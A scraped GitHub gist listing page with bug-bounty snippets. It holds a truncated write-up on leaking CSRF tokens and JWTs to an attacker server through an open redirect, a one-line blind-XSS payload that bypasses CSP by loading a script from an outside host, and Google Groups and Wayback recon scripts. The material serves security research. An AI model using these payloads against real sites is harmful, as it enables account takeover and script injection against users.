Skip to content

Instantly share code, notes, and snippets.

View DrErskine's full-sized avatar

Dr Erskine DrErskine

0 followers · 5 following
View GitHub Profile
@stefanocoding
stefanocoding / csrf_jwt_redirect_leak.md
Created May 15, 2019 23:46

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user 
    GET /verify/VALUE HTTP/1.1
Host: example.com
@Rhynorater
Rhynorater / gist:311cf3981fda8303d65c27316e69209f
Last active January 3, 2024 07:00
BXSS - CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
@EdOverflow
EdOverflow / googlegroups.sh
Created April 5, 2018 14:06
Find a public Google group for a particular host. Some of these groups contain sensitive information. The tool runs against a list of hosts and returns all public groups.
#!/bin/bash
# Find a public Google group for a particular host.
# Some of these groups contain sensitive information.
# The tool runs against a list of hosts and returns all public groups.
while read domain; do
if curl -LIs "https://groups.google.com/a/$domain" | grep "overview" > /dev/null; then
echo "[+] https://groups.google.com/a/$domain/forum/#!overview"
fi
@mhmdiaa
mhmdiaa / waybackurls.py
Last active February 23, 2025 03:46
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@mhmdiaa
mhmdiaa / waybackrobots.py
Last active February 8, 2025 06:36
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
@XVilka
XVilka / TrueColour.md
Last active March 3, 2025 14:09
True Colour (16 million colours) support in various terminal applications and terminals

THIS GIST WAS MOVED TO TERMSTANDARD/COLORS REPOSITORY.

PLEASE ASK YOUR QUESTIONS OR ADD ANY SUGGESTIONS AS A REPOSITORY ISSUES OR PULL REQUESTS INSTEAD!